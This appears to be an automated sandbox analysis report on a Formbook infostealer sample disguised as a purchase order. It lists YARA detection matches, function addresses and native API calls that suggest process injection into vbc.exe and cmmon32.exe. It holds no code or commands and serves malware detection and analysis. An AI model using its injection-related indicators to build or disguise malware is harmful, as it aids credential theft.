Source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\PO#12108997.exe Code function: 0_2_01B94360 0_2_01B94360
Source: C:\Users\user\Desktop\PO#12108997.exe Code function: 0_2_01B940B1 0_2_01B940B1
Source: C:\Users\user\Desktop\PO#12108997.exe Code function: 0_2_01B940C0 0_2_01B940C0
Source: C:\Users\user\Desktop\PO#12108997.exe Code function: 0_2_05DA4DD0 0_2_05DA4DD0
Source: C:\Users\user\Desktop\PO#12108997.exe Code function: 0_2_05DAACD8 0_2_05DAACD8
Source: C:\Users\user\Desktop\PO#12108997.exe Code function: 0_2_05DAF851 0_2_05DAF851
Source: C:\Users\user\Desktop\PO#12108997.exe Code function: 0_2_05DAF860 0_2_05DAF860
Source: C:\Users\user\Desktop\PO#12108997.exe Code function: 0_2_05DABA28 0_2_05DABA28
Source: C:\Users\user\Desktop\PO#12108997.exe Code function: 0_2_092D9B90 0_2_092D9B90
Source: C:\Users\user\Desktop\PO#12108997.exe Code function: 0_2_092D003B 0_2_092D003B
Source: C:\Users\user\Desktop\PO#12108997.exe Code function: 0_2_092D0040 0_2_092D0040
Source: C:\Users\user\Desktop\PO#12108997.exe Code function: 0_2_092D0BBD 0_2_092D0BBD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00401030 4_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041E83B 4_2_0041E83B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041ED4F 4_2_0041ED4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041E5CB 4_2_0041E5CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00402D90 4_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00409E5B 4_2_00409E5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00409E60 4_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041EE02 4_2_0041EE02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041D754 4_2_0041D754
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041E7C3 4_2_0041E7C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00402FB0 4_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05641D55 4_2_05641D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05642D07 4_2_05642D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05570D20 4_2_05570D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558D5E0 4_2_0558D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056425DD 4_2_056425DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A2581 4_2_055A2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563D466 4_2_0563D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558841F 4_2_0558841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05641FF1 4_2_05641FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0564DFCE 4_2_0564DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05596E30 4_2_05596E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563D616 4_2_0563D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05642EF7 4_2_05642EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557F900 4_2_0557F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05594120 4_2_05594120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0564E824 4_2_0564E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631002 4_2_05631002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A830 4_2_0559A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056428EC 4_2_056428EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558B090 4_2_0558B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056420A8 4_2_056420A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A20A0 4_2_055A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559AB40 4_2_0559AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05642B28 4_2_05642B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563DBD2 4_2_0563DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056303DA 4_2_056303DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AEBB0 4_2_055AEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0562FA2B 4_2_0562FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056422AE 4_2_056422AE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6841F 17_2_04A6841F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1D466 17_2_04B1D466
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A82581 17_2_04A82581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6D5E0 17_2_04A6D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B225DD 17_2_04B225DD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A50D20 17_2_04A50D20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B22D07 17_2_04B22D07
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B21D55 17_2_04B21D55
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B22EF7 17_2_04B22EF7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A76E30 17_2_04A76E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1D616 17_2_04B1D616
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B21FF1 17_2_04B21FF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2DFCE 17_2_04B2DFCE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A820A0 17_2_04A820A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B220A8 17_2_04B220A8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6B090 17_2_04A6B090
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B228EC 17_2_04B228EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2E824 17_2_04B2E824
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7A830 17_2_04A7A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11002 17_2_04B11002
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A799BF 17_2_04A799BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A74120 17_2_04A74120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A5F900 17_2_04A5F900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B222AE 17_2_04B222AE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B0FA2B 17_2_04B0FA2B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8EBB0 17_2_04A8EBB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1DBD2 17_2_04B1DBD2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B103DA 17_2_04B103DA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8ABD8 17_2_04A8ABD8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B22B28 17_2_04B22B28
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7A309 17_2_04A7A309
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7AB40 17_2_04A7AB40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DE83B 17_2_007DE83B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DED4F 17_2_007DED4F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DE5CB 17_2_007DE5CB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007C2D90 17_2_007C2D90
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007C9E60 17_2_007C9E60
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007C9E5B 17_2_007C9E5B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DEE02 17_2_007DEE02
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DE7C3 17_2_007DE7C3
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007C2FB0 17_2_007C2FB0
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: String function: 0557B150 appears 72 times
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04A5B150 appears 87 times
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A360 NtCreateFile, 4_2_0041A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A410 NtReadFile, 4_2_0041A410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A490 NtClose, 4_2_0041A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A540 NtAllocateVirtualMemory, 4_2_0041A540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A35A NtCreateFile,NtReadFile, 4_2_0041A35A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A3B2 NtCreateFile, 4_2_0041A3B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A40A NtReadFile, 4_2_0041A40A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A5BA NtAllocateVirtualMemory, 4_2_0041A5BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9540 NtReadFile,LdrInitializeThunk, 4_2_055B9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B95D0 NtClose,LdrInitializeThunk, 4_2_055B95D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9710 NtQueryInformationToken,LdrInitializeThunk, 4_2_055B9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9780 NtMapViewOfSection,LdrInitializeThunk, 4_2_055B9780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B97A0 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_055B97A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_055B9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B96E0 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_055B96E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_055B9910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B99A0 NtCreateSection,LdrInitializeThunk, 4_2_055B99A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9840 NtDelayExecution,LdrInitializeThunk, 4_2_055B9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9860 NtQuerySystemInformation,LdrInitializeThunk, 4_2_055B9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B98F0 NtReadVirtualMemory,LdrInitializeThunk, 4_2_055B98F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9A50 NtCreateFile,LdrInitializeThunk, 4_2_055B9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9A00 NtProtectVirtualMemory,LdrInitializeThunk, 4_2_055B9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9A20 NtResumeThread,LdrInitializeThunk, 4_2_055B9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9560 NtWriteFile, 4_2_055B9560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055BAD30 NtSetContextThread, 4_2_055BAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9520 NtWaitForSingleObject, 4_2_055B9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B95F0 NtQueryInformationFile, 4_2_055B95F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9770 NtSetInformationFile, 4_2_055B9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055BA770 NtOpenThread, 4_2_055BA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9760 NtOpenProcess, 4_2_055B9760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055BA710 NtOpenProcessToken, 4_2_055BA710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9730 NtQueryVirtualMemory, 4_2_055B9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9FE0 NtCreateMutant, 4_2_055B9FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9650 NtQueryValueKey, 4_2_055B9650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9670 NtQueryInformationProcess, 4_2_055B9670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9610 NtEnumerateValueKey, 4_2_055B9610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B96D0 NtCreateKey, 4_2_055B96D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9950 NtQueueApcThread, 4_2_055B9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B99D0 NtCreateProcessEx, 4_2_055B99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055BB040 NtSuspendThread, 4_2_055BB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9820 NtEnumerateKey, 4_2_055B9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B98A0 NtWriteVirtualMemory, 4_2_055B98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9B00 NtSetValueKey, 4_2_055B9B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055BA3B0 NtGetContextThread, 4_2_055BA3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9A10 NtQuerySection, 4_2_055B9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9A80 NtOpenDirectoryObject, 4_2_055B9A80
